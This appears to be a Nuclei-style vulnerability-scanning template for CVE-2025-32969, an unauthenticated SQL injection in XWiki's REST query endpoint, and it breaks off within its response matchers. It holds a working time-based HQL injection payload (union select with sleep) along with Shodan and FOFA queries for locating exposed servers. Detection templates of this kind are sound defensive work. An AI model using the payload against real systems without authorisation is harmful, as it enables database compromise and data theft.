id: CVE-2025-32969 info: name: XWiki REST API Query - SQL Injection author: ritikchaddha severity: critical description: | A SQL injection vulnerability exists in XWiki's REST API query endpoint. An unauthenticated attacker can execute arbitrary SQL queries through the 'q' parameter by manipulating the HQL query, potentially leading to data exfiltration or system compromise. impact: | Unauthenticated attackers can execute arbitrary SQL queries through the REST API query endpoint, potentially leading to complete database compromise and data exfiltration. remediation: | Upgrade to the latest XWiki version that properly sanitizes HQL query parameters in the REST API. reference: - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-f69v-xrj8-rhxf - https://nvd.nist.gov/vuln/detail/CVE-2025-32969 classification: cve-id: CVE-2025-32969 epss-score: 0.12804 epss-percentile: 0.94147 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-89 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2025,xwiki,sqli,rest-api,vkev,vuln http: - raw: - | @timeout: 20s GET /rest/wikis/xwiki/query?q=where%20doc.name=length(%27a%27)*org.apache.logging.log4j.util.Chars.SPACE%20or%201%3C%3E%271%5C%27%27%20union%20select%201,2,3,sleep(7)%20%23%27&type=hql&distinct=0 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'duration>=7' - 'status_code==200' - 'contains_all(body, "WikiManager", "